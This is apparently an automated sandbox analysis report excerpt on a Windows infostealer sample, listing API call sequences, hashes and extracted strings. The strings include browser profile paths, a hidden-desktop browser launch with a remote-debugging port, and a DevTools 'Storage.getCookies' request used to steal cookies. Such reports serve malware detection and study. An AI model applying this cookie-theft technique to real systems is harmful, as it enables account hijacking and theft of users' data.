lstrlen.KERNEL32(?), ref: 0082733B

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
String ID:
API String ID: 2413810636-0
Opcode ID: a15880421e0b6e13090d7e06172b01842defa61bcea22382080337a8775aa9df
Instruction ID: a7b77e673944eba747c301b957ad0a2cea93fa44a5193c9141513f8a453c70aa
Opcode Fuzzy Hash: a15880421e0b6e13090d7e06172b01842defa61bcea22382080337a8775aa9df
Instruction Fuzzy Hash: 6402C4B0A04266AFCB14ABB4ED89F9E7BB9FF04700F145414F901E7291DB78D991CBA1

Function 0081DDE7 Relevance: 87.0, APIs: 48, Strings: 1, Instructions: 1271stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081DE3A
lstrcpy.KERNEL32(00000000,?), ref: 0081DE85
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081DEC6
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081DEF6
FindFirstFileA.KERNEL32(?,?), ref: 0081DF07

Strings

\Brave\Preferences, xrefs: 0081E311

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirst
String ID: \Brave\Preferences
API String ID: 157892242-4187978112
Opcode ID: ba648e483d53a7619817f5449b6954dec88052d70b9f2bd4e488422e9a65328e
Instruction ID: 97d648fd2cf2cad67c37a1abc2b9fbf7b06304d311b1c466229793df5ebb17bd
Opcode Fuzzy Hash: ba648e483d53a7619817f5449b6954dec88052d70b9f2bd4e488422e9a65328e
Instruction Fuzzy Hash: 3BB28EB0A012168FCB24DF68C885AD97BF9FF44314F198569E809EB291DB74EC85CF91

Function 00824ED7 Relevance: 67.1, APIs: 44, Instructions: 1095stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00824F18
lstrcpy.KERNEL32(00000000,00000000), ref: 00824F3B
lstrcat.KERNEL32(00000000,00000000), ref: 00824F46
lstrlen.KERNEL32(00434CAC), ref: 00824F51
lstrcpy.KERNEL32(00000000,00000000), ref: 00824F6E
lstrcat.KERNEL32(00000000,00434CAC), ref: 00824F7A
lstrcpy.KERNEL32(00000000,00000000), ref: 00824FA5
FindFirstFileA.KERNEL32(00000000,?), ref: 00824FC1

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID:
API String ID: 2567437900-0
Opcode ID: abf83bfebb2cf84ae799a53d4b40eba78f64241fe3722bf44118b7379ea49842
Instruction ID: b053a1ad7f81d04cf4baa681b9b01aa7007747a5800a12b2671231eda7bd81e2
Opcode Fuzzy Hash: abf83bfebb2cf84ae799a53d4b40eba78f64241fe3722bf44118b7379ea49842
Instruction Fuzzy Hash: DD924C70A416258FDB18CF29E988B69B7E5FF44314F1980ADE809DB2A1DB75DC81CF90

Function 00821607 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00821648
lstrcpy.KERNEL32(00000000,00000000), ref: 0082166B
lstrcat.KERNEL32(00000000,00000000), ref: 00821676
lstrlen.KERNEL32(00434CAC), ref: 00821681
lstrcpy.KERNEL32(00000000,00000000), ref: 0082169E
lstrcat.KERNEL32(00000000,00434CAC), ref: 008216AA
lstrcpy.KERNEL32(00000000,00000000), ref: 008216D5
FindFirstFileA.KERNEL32(00000000,?), ref: 008216F1
StrCmpCA.SHLWAPI(?,004317A8), ref: 00821713
StrCmpCA.SHLWAPI(?,004317AC), ref: 0082172D
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00821766
lstrcpy.KERNEL32(00000000,?), ref: 0082178E
lstrcat.KERNEL32(00000000,00000000), ref: 00821799
lstrlen.KERNEL32(0043179C), ref: 008217A4
lstrcpy.KERNEL32(00000000,00000000), ref: 008217C1
lstrcat.KERNEL32(00000000,0043179C), ref: 008217CD
lstrlen.KERNEL32(?), ref: 008217DA
lstrcpy.KERNEL32(00000000,00000000), ref: 008217FA
lstrcat.KERNEL32(00000000,?), ref: 00821808
lstrcpy.KERNEL32(00000000,00000000), ref: 00821831
StrCmpCA.SHLWAPI(?,00638C28), ref: 0082185A
lstrcpy.KERNEL32(00000000,?), ref: 0082189B
lstrcpy.KERNEL32(00000000,?), ref: 008218C4
lstrcpy.KERNEL32(00000000,00000000), ref: 008218EC
StrCmpCA.SHLWAPI(?,006388A8), ref: 00821909
lstrcpy.KERNEL32(00000000,?), ref: 0082194A
lstrcpy.KERNEL32(00000000,?), ref: 00821973
lstrcpy.KERNEL32(00000000,00000000), ref: 0082199B
StrCmpCA.SHLWAPI(?,00638E3C), ref: 008219B9
lstrcpy.KERNEL32(00000000,00000000), ref: 008219EA
lstrcpy.KERNEL32(00000000,?), ref: 00821A13
lstrcpy.KERNEL32(00000000,?), ref: 00821A3C
StrCmpCA.SHLWAPI(?,00638938), ref: 00821A6A
lstrcpy.KERNEL32(00000000,?), ref: 00821AAB
lstrcpy.KERNEL32(00000000,?), ref: 00821AD4
lstrcpy.KERNEL32(00000000,00000000), ref: 00821AFC
lstrcpy.KERNEL32(00000000,?), ref: 00821B4D
lstrcpy.KERNEL32(00000000,00000000), ref: 00821B75
lstrcpy.KERNEL32(00000000,?), ref: 00821BAC
FindNextFileA.KERNEL32(00000000,?), ref: 00821BD3
FindClose.KERNEL32(00000000), ref: 00821BE2

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
String ID:
API String ID: 1346933759-0
Opcode ID: 69f82b8a34e175699ce359a29f9c303c49b7368df97e84358e78f1152d2ab2d3
Instruction ID: 0830951d7a8dad0fcc61d93276fb381df7a0711f52cc6a3e212492f025b95685
Opcode Fuzzy Hash: 69f82b8a34e175699ce359a29f9c303c49b7368df97e84358e78f1152d2ab2d3
Instruction Fuzzy Hash: D41250B0A012169BCF24AF78DC89AAE7BB9FF54314F144528F845E7650EB34DC94CBA1

Function 00836807 Relevance: 48.2, APIs: 32, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 00836860
GetProcAddress.KERNEL32(006390E0,00638E44), ref: 00836879
GetProcAddress.KERNEL32(006390E0,00638A64), ref: 00836891
GetProcAddress.KERNEL32(006390E0,00638A50), ref: 008368A9
GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 008368C2
GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 008368DA
GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 008368F2
GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0083690B
GetProcAddress.KERNEL32(006390E0,00638D48), ref: 00836923
GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0083693B
GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 00836954
GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0083696C
GetProcAddress.KERNEL32(006390E0,006388B0), ref: 00836984
GetProcAddress.KERNEL32(006390E0,00638D98), ref: 0083699D
GetProcAddress.KERNEL32(006390E0,00638A24), ref: 008369B5
GetProcAddress.KERNEL32(006390E0,00638C18), ref: 008369CD
GetProcAddress.KERNEL32(006390E0,00638E34), ref: 008369E6
GetProcAddress.KERNEL32(006390E0,006388BC), ref: 008369FE
GetProcAddress.KERNEL32(006390E0,0063892C), ref: 00836A16
GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 00836A2F
LoadLibraryA.KERNEL32(00638D50,?,?,?,0083203A), ref: 00836A40
LoadLibraryA.KERNEL32(0063897C,?,?,?,0083203A), ref: 00836A52
LoadLibraryA.KERNEL32(00638904,?,?,?,0083203A), ref: 00836A64
LoadLibraryA.KERNEL32(006389DC,?,?,?,0083203A), ref: 00836A75
LoadLibraryA.KERNEL32(00638B28,?,?,?,0083203A), ref: 00836A87
GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 00836AA4
GetProcAddress.KERNEL32(00639020,00638C24), ref: 00836AC0
GetProcAddress.KERNEL32(00639020,006389CC), ref: 00836AD8
GetProcAddress.KERNEL32(00639114,00638B94), ref: 00836AF4
GetProcAddress.KERNEL32(00638FD4,00638928), ref: 00836B10
GetProcAddress.KERNEL32(00639004,00638C14), ref: 00836B2C
GetProcAddress.KERNEL32(00639004,004352A4), ref: 00836B43

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
Instruction ID: f58c4c551083613f28d6626c6725dd0c08b3a229f8e7abcb83ae54a706a11aaf
Opcode Fuzzy Hash: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
Instruction Fuzzy Hash: 94A15CB9A117009FD758DF69EE88A6637BBF789344300A51DF946C3260DBB4A900DFB0

Function 00409770 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 233stringsleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409790
lstrcatA.KERNEL32(?,?), ref: 004097A0
lstrcatA.KERNEL32(?,?), ref: 004097B1
lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004097C3
memset.MSVCRT ref: 004097D7

Part of subcall function 00424040: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00424075
Part of subcall function 00424040: lstrcpy.KERNEL32(00000000,0090CC60), ref: 0042409F
Part of subcall function 00424040: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404DFA,?,00000014), ref: 004240A9

wsprintfA.USER32 ref: 00409806
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409827
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409844

Part of subcall function 004248B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004248C9
Part of subcall function 004248B0: Process32First.KERNEL32(00000000,00000128), ref: 004248D9
Part of subcall function 004248B0: Process32Next.KERNEL32(00000000,00000128), ref: 004248EB
Part of subcall function 004248B0: StrCmpCA.SHLWAPI(?,?), ref: 004248FD
Part of subcall function 004248B0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424912
Part of subcall function 004248B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00424921
Part of subcall function 004248B0: CloseHandle.KERNEL32(00000000), ref: 00424928
Part of subcall function 004248B0: Process32Next.KERNEL32(00000000,00000128), ref: 00424936
Part of subcall function 004248B0: CloseHandle.KERNEL32(00000000), ref: 00424941

memset.MSVCRT ref: 00409862
lstrcatA.KERNEL32(00000000,?), ref: 00409878
lstrcatA.KERNEL32(00000000,?), ref: 00409889
lstrcatA.KERNEL32(00000000,00434B68), ref: 0040989B
memset.MSVCRT ref: 004098AF
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004098D4
lstrcpy.KERNEL32(00000000,?), ref: 00409903
StrStrA.SHLWAPI(00000000,009108A8), ref: 00409919
lstrcpyn.KERNEL32(006393D0,00000000,00000000), ref: 00409938
lstrlenA.KERNEL32(?), ref: 0040994B
wsprintfA.USER32 ref: 0040995B
lstrcpy.KERNEL32(?,00000000), ref: 00409971
memset.MSVCRT ref: 00409986
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004099D8
Sleep.KERNEL32(00001388), ref: 004099E7

Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF

Part of subcall function 004092B0: strlen.MSVCRT ref: 004092E1
Part of subcall function 004092B0: strlen.MSVCRT ref: 004092FA
Part of subcall function 004092B0: memset.MSVCRT ref: 00409341
Part of subcall function 004092B0: lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040935C
Part of subcall function 004092B0: lstrcatA.KERNEL32(?,00000000), ref: 00409372
Part of subcall function 004092B0: strlen.MSVCRT ref: 00409399
Part of subcall function 004092B0: strlen.MSVCRT ref: 004093E6

Part of subcall function 00424950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424969
Part of subcall function 00424950: Process32First.KERNEL32(00000000,00000128), ref: 00424979
Part of subcall function 00424950: Process32Next.KERNEL32(00000000,00000128), ref: 0042498B
Part of subcall function 00424950: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004249AC
Part of subcall function 00424950: TerminateProcess.KERNEL32(00000000,00000000), ref: 004249BB
Part of subcall function 00424950: CloseHandle.KERNEL32(00000000), ref: 004249C2
Part of subcall function 00424950: Process32Next.KERNEL32(00000000,00000128), ref: 004249D0
Part of subcall function 00424950: CloseHandle.KERNEL32(00000000), ref: 004249DB

CloseDesktop.USER32(?), ref: 00409A1C

Strings

--remote-debugging-port=9229 --profile-directory=", xrefs: 004097B7
D, xrefs: 00409999
%s%s, xrefs: 00409955

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy$Process32memset$CloseProcess$CreateHandleNextstrlen$DesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
API String ID: 67568813-1862457068
Opcode ID: 00b035d950b74c1e18f720c8a6b7436ad5d54e5c15cdef3bf64e2d32ed229c4e
Instruction ID: ccf3e315bf26f4905068c089cbdebd89087d04a1aa32e64f9bfb9bced8b1062f
Opcode Fuzzy Hash: 00b035d950b74c1e18f720c8a6b7436ad5d54e5c15cdef3bf64e2d32ed229c4e
Instruction Fuzzy Hash: A0916371A10218AFDB10DF64DC89FDE77B9AF48700F504169F609A72D1DFB4AA448FA4

Function 00821620 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00821648
lstrcpy.KERNEL32(00000000,00000000), ref: 0082166B
lstrcat.KERNEL32(00000000,00000000), ref: 00821676
lstrlen.KERNEL32(00434CAC), ref: 00821681
lstrcpy.KERNEL32(00000000,00000000), ref: 0082169E
lstrcat.KERNEL32(00000000,00434CAC), ref: 008216AA
lstrcpy.KERNEL32(00000000,00000000), ref: 008216D5
FindFirstFileA.KERNEL32(00000000,?), ref: 008216F1
StrCmpCA.SHLWAPI(?,004317A8), ref: 00821713
StrCmpCA.SHLWAPI(?,004317AC), ref: 0082172D
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00821766
lstrcpy.KERNEL32(00000000,?), ref: 0082178E
lstrcat.KERNEL32(00000000,00000000), ref: 00821799
lstrlen.KERNEL32(0043179C), ref: 008217A4
lstrcpy.KERNEL32(00000000,00000000), ref: 008217C1
lstrcat.KERNEL32(00000000,0043179C), ref: 008217CD
lstrlen.KERNEL32(?), ref: 008217DA
lstrcpy.KERNEL32(00000000,00000000), ref: 008217FA
lstrcat.KERNEL32(00000000,?), ref: 00821808
lstrcpy.KERNEL32(00000000,00000000), ref: 00821831
StrCmpCA.SHLWAPI(?,00638C28), ref: 0082185A
lstrcpy.KERNEL32(00000000,?), ref: 0082189B
lstrcpy.KERNEL32(00000000,?), ref: 008218C4
lstrcpy.KERNEL32(00000000,00000000), ref: 008218EC
StrCmpCA.SHLWAPI(?,006388A8), ref: 00821909
lstrcpy.KERNEL32(00000000,?), ref: 0082194A
lstrcpy.KERNEL32(00000000,?), ref: 00821973
lstrcpy.KERNEL32(00000000,00000000), ref: 0082199B
lstrcpy.KERNEL32(00000000,?), ref: 00821B4D
lstrcpy.KERNEL32(00000000,00000000), ref: 00821B75
lstrcpy.KERNEL32(00000000,?), ref: 00821BAC
FindNextFileA.KERNEL32(00000000,?), ref: 00821BD3
FindClose.KERNEL32(00000000), ref: 00821BE2

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
String ID:
API String ID: 1346933759-0
Opcode ID: 4016f199514c1f5fd0f46e4552ba435dff2a21db5c9c9cafdfa5a6eda3dd38da
Instruction ID: a16b213583a51d38a0dc9e73ca374ae16672d834a12459456db008bdba87534b
Opcode Fuzzy Hash: 4016f199514c1f5fd0f46e4552ba435dff2a21db5c9c9cafdfa5a6eda3dd38da
Instruction Fuzzy Hash: 8EC19FB1A002569BCF24AF78DC89AAE7BB9FF54314F144528F805E3251EB34DC94CBA1

Function 0082D037 Relevance: 40.8, APIs: 27, Instructions: 310filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0082D053
FindFirstFileA.KERNEL32(?,?), ref: 0082D06A
lstrcat.KERNEL32(?,?), ref: 0082D0B6
StrCmpCA.SHLWAPI(?,004317A8), ref: 0082D0C8
StrCmpCA.SHLWAPI(?,004317AC), ref: 0082D0E2
wsprintfA.USER32 ref: 0082D107
PathMatchSpecA.SHLWAPI(?,00638D64), ref: 0082D139
CoInitialize.OLE32(00000000), ref: 0082D145

Part of subcall function 0082CF37: CoCreateInstance.COMBASE(0042B118,00000000,00000001,0042B108,?), ref: 0082CF5D
Part of subcall function 0082CF37: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0082CF9D
Part of subcall function 0082CF37: lstrcpyn.KERNEL32(?,?,00000104), ref: 0082D020

CoUninitialize.COMBASE ref: 0082D160
lstrcat.KERNEL32(?,?), ref: 0082D185
lstrlen.KERNEL32(?), ref: 0082D192
StrCmpCA.SHLWAPI(?,0042CFF4), ref: 0082D1AC
wsprintfA.USER32 ref: 0082D1D4
wsprintfA.USER32 ref: 0082D1F3
PathMatchSpecA.SHLWAPI(?,?), ref: 0082D207
wsprintfA.USER32 ref: 0082D22F
CopyFileA.KERNEL32(?,?,00000001), ref: 0082D248
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0082D267
GetFileSizeEx.KERNEL32(00000000,?), ref: 0082D27F
CloseHandle.KERNEL32(00000000), ref: 0082D28A
CloseHandle.KERNEL32(00000000), ref: 0082D296
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0082D2AB
lstrcpy.KERNEL32(00000000,?), ref: 0082D2EB
FindNextFileA.KERNEL32(?,?), ref: 0082D3E4
FindClose.KERNEL32(?), ref: 0082D3F6

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
String ID:
API String ID: 3860919712-0
Opcode ID: c62db9f1239c5b56a90141e50f58a1dace6ef3df8e9e956f0b9c83b98286ded3
Instruction ID: 26528d1971acae8546ec29497a797feb9e4e2d2bf9fbc47d482f7ebf55d4ce09
Opcode Fuzzy Hash: c62db9f1239c5b56a90141e50f58a1dace6ef3df8e9e956f0b9c83b98286ded3
Instruction Fuzzy Hash: 1FC16E719003199FCB14DF64DC49AEE77BAFF48300F144599F509E7290EA74AA94CFA1

Function 0082E657 Relevance: 30.2, APIs: 20, Instructions: 212stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0082E673
FindFirstFileA.KERNEL32(?,?), ref: 0082E68A
StrCmpCA.SHLWAPI(?,004317A8), ref: 0082E6AA
StrCmpCA.SHLWAPI(?,004317AC), ref: 0082E6C4
wsprintfA.USER32 ref: 0082E6E9
StrCmpCA.SHLWAPI(?,0042CFF4), ref: 0082E6FB
wsprintfA.USER32 ref: 0082E718

Part of subcall function 0082F227: lstrcpy.KERNEL32(00000000,?), ref: 0082F259

wsprintfA.USER32 ref: 0082E737
PathMatchSpecA.SHLWAPI(?,?), ref: 0082E74B
lstrcat.KERNEL32(?,00638D24), ref: 0082E77C
lstrcat.KERNEL32(?,0043179C), ref: 0082E78E
lstrcat.KERNEL32(?,?), ref: 0082E79F
lstrcat.KERNEL32(?,0043179C), ref: 0082E7B1
lstrcat.KERNEL32(?,?), ref: 0082E7C5
CopyFileA.KERNEL32(?,?,00000001), ref: 0082E7DB
lstrcpy.KERNEL32(00000000,?), ref: 0082E819
lstrcpy.KERNEL32(00000000,?), ref: 0082E869
DeleteFileA.KERNEL32(?), ref: 0082E8A3

Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117BE
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117E0
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811802
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811866

FindNextFileA.KERNEL32(00000000,?), ref: 0082E8E2
FindClose.KERNEL32(00000000), ref: 0082E8F1

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID:
API String ID: 1375681507-0
Opcode ID: cbdc7a8e7980bf74e1f1bafba4d47ed907f42b6c6a1d34f8b5cba67d4a00db37
Instruction ID: 6f29cfb6766557ccd64016bd9600cc14a540e2eb300d6d99370dd6cb608c0df9
Opcode Fuzzy Hash: cbdc7a8e7980bf74e1f1bafba4d47ed907f42b6c6a1d34f8b5cba67d4a00db37
Instruction Fuzzy Hash: 2C818EB19002199FCB24EF64DC49EEE77B9FF48300F0485A9B509D7150EB75AA98CFA1

Function 00811920 Relevance: 25.7, APIs: 17, Instructions: 219stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00811949
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00811980
lstrcpy.KERNEL32(00000000,00000000), ref: 008119D3
lstrcat.KERNEL32(00000000), ref: 008119DD
lstrcpy.KERNEL32(00000000,00000000), ref: 00811A09
lstrcpy.KERNEL32(00000000,?), ref: 00811B5A
lstrcat.KERNEL32(00000000,00000000), ref: 00811B65

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat
String ID:
API String ID: 2276651480-0
Opcode ID: 633228e4bc9449fbd67834a4c377551609ea7f1912ca21f54d1a05a69bf1839c
Instruction ID: 1b16f395d17760f72134b65108c02bb4f001457f8339ae33b2f105f49e11c884
Opcode Fuzzy Hash: 633228e4bc9449fbd67834a4c377551609ea7f1912ca21f54d1a05a69bf1839c
Instruction Fuzzy Hash: E7816CB490525A9BCF14EF68C989AED7BB9FF00304F044124FA14E7251EB349DA4CBE2

Function 0082E187 Relevance: 24.2, APIs: 16, Instructions: 171stringfilememoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0082E19C
RtlAllocateHeap.NTDLL(00000000), ref: 0082E1A3
wsprintfA.USER32 ref: 0082E1B9
FindFirstFileA.KERNEL32(?,?), ref: 0082E1D0
StrCmpCA.SHLWAPI(?,004317A8), ref: 0082E1F3
StrCmpCA.SHLWAPI(?,004317AC), ref: 0082E20D
wsprintfA.USER32 ref: 0082E22B
DeleteFileA.KERNEL32(?), ref: 0082E277
CopyFileA.KERNEL32(?,?,00000001), ref: 0082E244

Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117BE
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117E0
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811802
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811866

Part of subcall function 0082DDD7: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082DE32
Part of subcall function 0082DDD7: lstrcpy.KERNEL32(00000000,?), ref: 0082DE65
Part of subcall function 0082DDD7: lstrcat.KERNEL32(?,00000000), ref: 0082DE73
Part of subcall function 0082DDD7: lstrcat.KERNEL32(?,00638B0C), ref: 0082DE8D
Part of subcall function 0082DDD7: lstrcat.KERNEL32(?,?), ref: 0082DEA1
Part of subcall function 0082DDD7: lstrcat.KERNEL32(?,00638DD8), ref: 0082DEB5
Part of subcall function 0082DDD7: lstrcpy.KERNEL32(00000000,?), ref: 0082DEE5
Part of subcall function 0082DDD7: GetFileAttributesA.KERNEL32(00000000), ref: 0082DEEC

FindNextFileA.KERNEL32(00000000,?), ref: 0082E285
FindClose.KERNEL32(00000000), ref: 0082E294
lstrcat.KERNEL32(?,00638D24), ref: 0082E2BD
lstrcat.KERNEL32(?,00638A2C), ref: 0082E2D1
lstrlen.KERNEL32(?), ref: 0082E2DB
lstrlen.KERNEL32(?), ref: 0082E2E9
lstrcpy.KERNEL32(00000000,?), ref: 0082E329

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
String ID:
API String ID: 3181694991-0
Opcode ID: 0f37103e82c5a4568463b042abc7ca8e9f21ceb6c64aa213664397140c8b5a22
Instruction ID: 2e2b993ff0097033d46278bb5cccf2ccc6a7167ae628bfacf8bff71854f9bfe4
Opcode Fuzzy Hash: 0f37103e82c5a4568463b042abc7ca8e9f21ceb6c64aa213664397140c8b5a22
Instruction Fuzzy Hash: F6616075900219AFCB14EFB8DC89AED77BAFF48300F0045A9B605D7251EB34AA94CF91

Function 00834D27 Relevance: 22.1, APIs: 9, Strings: 5, Instructions: 1120stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00834D55
strlen.MSVCRT ref: 00834D7F

Part of subcall function 00818BE7: std::_Xinvalid_argument.LIBCPMT ref: 00818BFD

strlen.MSVCRT ref: 00834DC4
memcmp.MSVCRT(?,004351F4,?), ref: 00834DFA

Part of subcall function 00818BE7: std::_Xinvalid_argument.LIBCPMT ref: 00818C34
Part of subcall function 00818BE7: memcpy.MSVCRT(?,00000000,?,00000000,?,?,00818A37,?,00000000,00817AFE), ref: 00818C92

Part of subcall function 00835D07: memmove.MSVCRT(?,?,?,00000000), ref: 00835D4E

strlen.MSVCRT ref: 008350BE

Strings

HTTP/1.1Host: , xrefs: 00835339
Sec-WebSocket-Version: 13, xrefs: 0083539F
Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 0083537B
:, xrefs: 00834F79
{"id":1,"method":"Storage.getCookies"}, xrefs: 0083547A

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: strlen$Xinvalid_argumentstd::_$memcmpmemcpymemmove
